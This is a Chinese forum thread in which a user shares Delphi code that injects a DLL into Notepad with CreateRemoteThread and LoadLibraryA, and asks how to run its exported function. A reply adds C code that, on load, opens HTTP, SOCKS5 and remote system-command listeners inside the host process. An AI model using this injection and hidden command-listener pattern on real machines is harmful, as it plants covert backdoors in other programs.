请教DLL远程注入问题!(50分)

  • 主题发起人 主题发起人 hmy211
  • 开始时间 开始时间
H

hmy211

Unregistered / Unconfirmed
GUEST, unregistred user!
library MyDll;<br>{$R *.res}<br><br>uses<br>&nbsp; Windows;<br><br>function Testdll: Pointer; stdcall;<br>begin<br>&nbsp; MessageBox(0,'Dll驻留成功!','Dll',0); &nbsp;<br>end;<br><br>exports<br>&nbsp; Testdll;<br>begin<br>&nbsp; MessageBox(0,'DLL安装成功','DLL',0);<br>end.<br><br>一个这样的DLL文件。我要求让他插入记事本里面。并显示'Dll驻留成功!'这个对话框!<br>我这有个插入记事本的例子.但这样只会显示'DLL安装成功'消息.<br>我现在要让他也显示'Dll驻留成功!'消息框.请问需要怎么处理.(前提DLL文件不能变动)<br>procedure TmyForm.Button1Click(Sender: TObject);<br>var<br>&nbsp; h:longword; //放句柄,中间顺便暂放下PID<br>&nbsp; tmp:longword;//这个专门来占格式收集垃圾<br>&nbsp; DllName:pchar;<br>&nbsp; Mysize:longword;//放字符串长度<br>&nbsp; Parameter:pointer;//放那个参数的指针(位置在目标进程内)<br>begin<br>&nbsp;DLLName:='MyDll.dll';<br>&nbsp;Mysize:=strlen(Dllname)+1;<br>&nbsp;winexec('notepad',1);<br>&nbsp;GetWindowThreadProcessId(FindWindow('notepad', nil), @h);<br>&nbsp;h:=OpenProcess(PROCESS_ALL_ACCESS, False, h);<br>&nbsp;Parameter:= VirtualAllocEx(h, nil, Mysize, MEM_COMMIT, PAGE_READWRITE);<br>&nbsp;WriteProcessMemory(h, Parameter, Pointer(DllName), MySize, tmp);<br>&nbsp;CreateRemoteThread(h,nil, &nbsp;0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameter, 0 , tmp);<br>end;
 
怎么没人帮忙呢
 
你的意思是不是想既自动载入dll,又自动执行里面的函数?<br>我的做法是:在DLL_PROCESS_ATTACH中BeginThread
 
你都安装上去了<br>还怕不能调用???
 
直接调用<br>Testdll不要就可以了么
 
TrustMe 能把你的做法给我个实例吗?谢谢了!
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)<br>{<br>&nbsp; &nbsp; switch (fdwReason)<br>&nbsp; &nbsp; {<br>&nbsp; &nbsp; &nbsp; &nbsp; case DLL_PROCESS_ATTACH:<br>&nbsp; &nbsp; &nbsp; &nbsp; {<br>&nbsp; &nbsp; &nbsp; &nbsp; hinstance = hinstDLL;<br> CreateThread(NULL, 0, exec_main, NULL, 0, NULL);<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br>&nbsp; &nbsp; &nbsp; &nbsp; };<br>&nbsp; &nbsp; &nbsp; &nbsp; case DLL_PROCESS_DETACH:<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br><br>&nbsp; &nbsp; &nbsp; &nbsp; case DLL_THREAD_ATTACH:<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br><br>&nbsp; &nbsp; &nbsp; &nbsp; case DLL_THREAD_DETACH:<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br>&nbsp; &nbsp; }<br>&nbsp; &nbsp; return TRUE; // succesful<br>}<br><br>DWORD WINAPI exec_main(void* p)<br>{<br> if(shared_init() == 0)<br> {<br> unsigned short port1 = 8000;<br> unsigned short port2 = 1080;<br> unsigned short port3 = 8686;<br> SOCKET svr1 = shared_start_svr(&amp;port1, http_cltproc);<br> SOCKET svr2 = shared_start_svr(&amp;port2, sock5_cltproc);<br> SOCKET svr3 = shared_start_svr(&amp;port3, syscmd_cltproc);<br> char s[0xfff];<br><br> // TODO : 2008-09-22<br> mydns_init();<br><br> shared_printf("bind and listen on [http : %d , sock5 : %d , syscmd : %d ] ok./n", port1, port2, port3);<br> do<br> {<br> Sleep(1000);<br> }while(TRUE);<br> }<br><br> mydns_done();<br> shared_done();<br><br>&nbsp; &nbsp; return 0;<br>}
 
后退
顶部